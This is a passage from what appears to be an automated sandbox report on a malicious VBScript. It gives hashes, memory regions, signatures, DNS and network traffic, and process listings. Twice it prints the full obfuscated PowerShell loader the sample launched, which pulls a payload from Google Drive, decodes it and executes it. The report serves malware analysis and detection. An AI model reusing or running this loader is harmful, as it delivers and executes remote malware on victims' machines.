memory/856-293-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1092-294-0x0000000005630000-0x0000000005631000-memory.dmp

memory/1092-292-0x0000000006620000-0x000000000A2C8000-memory.dmp

memory/856-295-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1092-296-0x0000000076EA0000-0x0000000077049000-memory.dmp

memory/1092-297-0x0000000072F90000-0x000000007353B000-memory.dmp

memory/1092-298-0x0000000077090000-0x0000000077166000-memory.dmp

memory/1092-299-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

memory/2356-300-0x0000000076EA0000-0x0000000077049000-memory.dmp

memory/2356-303-0x0000000077090000-0x0000000077166000-memory.dmp

memory/2356-302-0x00000000770C6000-0x00000000770C7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 646d58e4428405c544e09efe52f7777e
SHA1 27cfe7046da07b642f19c9dca09841cf19660a19
SHA256 241d4569065467443b5470bd99127fdb6d990c021b895ce38ed62450cf80eabc
SHA512 1414ae8078c9af4b242623f380f25956367d03db4e60e22e44e5407514927196eec6ded0086e68a8fad2ef22b6defca63806c63f1f34ebea5f43d0a00da69d87

C:\Users\Admin\AppData\Local\Temp\Tar9FE8.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/2356-324-0x0000000000B40000-0x0000000001BA2000-memory.dmp

memory/2356-325-0x0000000077090000-0x0000000077166000-memory.dmp

memory/2356-326-0x0000000001BB0000-0x0000000005858000-memory.dmp

memory/856-329-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2356-328-0x0000000077090000-0x0000000077166000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 10:33

Reported

2024-04-02 10:36

Platform

win10v2004-20231215-en

Max time kernel

92s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4232 -ip 4232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 2580

Network

Country Destination Domain Proto
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.178.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 99.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 218.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 bc1cf314b005d09b35ef60120370d522
SHA1 23defd1625da6b63e19395f6b0e33d18d300f717
SHA256 276411a8c82dfe4093d3c1565a84bf0f0ba7264e31a4451fcb2337f3d4f9002b
SHA512 cfdae13b2a8bf95e43140f5e2b78ad112fd361cdaf8b5b95e1c94de3ae5b67c685538a12a264e1a3d0b03456e16f6636257d57aef7127c4f22a801c3aa1ed8f4

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 aae354de6a220541f89d7677795ecb63
SHA1 0d9ba51a9f59140568acf0d808f541048b0d5184
SHA256 9872edaf3a84593ec9e070a50d47c4e5a2d6f90fce2a4660841ee822b187b563
SHA512 a3c370ac3e4ab46cdee1ed42a337bd4c9466ff99dd79bdb145d38ae99d2fdda370c873b9ab2f838a0e860b2d13a8026643a5903abccb5e2e362f94ea89e06ee3

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 b1144019ffec4ccf65bc9771f7210179
SHA1 65c93abc5a24d5a0441a6dbbcce2a3c79cb186a1
SHA256 6ae2757d6b31b2ce0e3bf86274d8042d0d61b946f4aa56bf7fd6b2937a906893
SHA512 8c282eabad88a50dea7ca99f2b492d20a8ace1811155119324f61ee4832c470b401ccf6e0cc6d52f26fb9d20594e541092805fba4659e50ecb3b1f096d50a82e

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 b59dd8b19715ca519b51d0001a929f86
SHA1 ad85d8a0910a91ab6edd033440c11a3838f7d144
SHA256 41576d8efb696356764f7277c60755d3045a47b506b8d58feb3ea294b97731a0
SHA512 4a993657374b6bafa09a03b9932861bcb04e7c7e441b56d69f16614f49e7eb9ecac09213b7f0f6277cbd43584df20134b6a539e70ed04021f5819a6f40f497b6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br2rfiqb.w2e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1736-246-0x000001C7A8DE0000-0x000001C7A8E02000-memory.dmp

memory/1736-254-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

memory/1736-255-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/1736-256-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/1736-257-0x000001C7A9150000-0x000001C7A9176000-memory.dmp

memory/1736-258-0x000001C7A91E0000-0x000001C7A91F4000-memory.dmp

memory/1736-259-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/4232-261-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/4232-260-0x0000000004EB0000-0x0000000004EE6000-memory.dmp

memory/4232-262-0x0000000002B10000-0x0000000002B20000-memory.dmp

memory/4232-263-0x0000000005520000-0x0000000005B48000-memory.dmp

memory/4232-264-0x0000000005480000-0x00000000054A2000-memory.dmp

memory/4232-265-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/4232-266-0x0000000005D30000-0x0000000005D96000-memory.dmp

memory/4232-276-0x0000000005E20000-0x0000000006174000-memory.dmp

memory/4232-277-0x0000000006440000-0x000000000645E000-memory.dmp

memory/4232-278-0x0000000006980000-0x00000000069CC000-memory.dmp

memory/4232-280-0x0000000006A20000-0x0000000006A3A000-memory.dmp

memory/4232-279-0x0000000007C80000-0x00000000082FA000-memory.dmp

memory/4232-282-0x0000000007690000-0x00000000076B2000-memory.dmp

memory/4232-281-0x0000000007700000-0x0000000007796000-memory.dmp

memory/4232-283-0x00000000088B0000-0x0000000008E54000-memory.dmp

memory/4232-284-0x00000000078E0000-0x0000000007902000-memory.dmp

memory/4232-285-0x0000000007940000-0x0000000007954000-memory.dmp

memory/4232-286-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/1736-289-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp